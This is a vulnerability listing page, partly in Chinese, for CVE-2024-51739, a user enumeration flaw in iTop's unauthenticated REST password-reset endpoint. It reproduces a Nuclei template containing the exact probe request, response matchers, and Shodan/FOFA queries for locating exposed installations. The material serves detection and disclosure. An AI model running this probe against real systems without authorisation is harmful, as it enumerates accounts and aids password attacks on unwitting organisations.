CVE-2024-51739: iTop - User Enumeration via REST Endpoint

日期: 2025-08-01 | 影响软件: iTop | POC: 已公开

漏洞描述

From the webservices/rest.php file, several operations are accessible from an unauthenticated user. One of them is `do_reset_pwd`, allowing to reset a user password. This feature can be abused to perform user enumeration when a non-existent user is provided.

PoC代码[已公开]

id: CVE-2024-51739

info:
  name: iTop - User Enumeration via REST Endpoint
  author: DhiyaneshDk
  severity: medium
  description: |
    From the webservices/rest.php file, several operations are accessible from an unauthenticated user. One of them is `do_reset_pwd`, allowing to reset a user password. This feature can be abused to perform user enumeration when a non-existent user is provided.
  reference:
    - https://www.synacktiv.com/en/advisories/multiple-vulnerabilities-on-itop
    - https://github.com/Combodo/iTop/security/advisories/GHSA-2hmf-p27w-phf9
    - https://nvd.nist.gov/vuln/detail/CVE-2024-51739
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cve-id: CVE-2024-51739
    cwe-id: CWE-200
    epss-score: 0.46896
    epss-percentile: 0.97609
    cpe: cpe:2.3:a:combodo:itop:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: combodo
    product: itop
    shodan-query: http.html:" itop login"
    fofa-query: body=" itop login"
  tags: cve,cve2024,itop,enum,unauth

http:
  - method: GET
    path:
      - "{{BaseURL}}/webservices/rest.php?loginop=do_reset_pwd&auth_user=doesnotexist"

    matchers:
      - type: word
        part: body
        words:
          - "<h1>Reset password</h1>"
          - "&#039;doesnotexist&#039; is not a valid login"
        condition: and
# digest: 490a0046304402207965edf26d2b1e20bac8244182bbf8e8b3d043fac9719e0b4110778523345fc202201a3f1c517c843cfea544fbbb2a96d1b94cab4e4ed2503181d5151c0a28b019e6:922c64590222798bb761d5b6d8e72950

相关漏洞推荐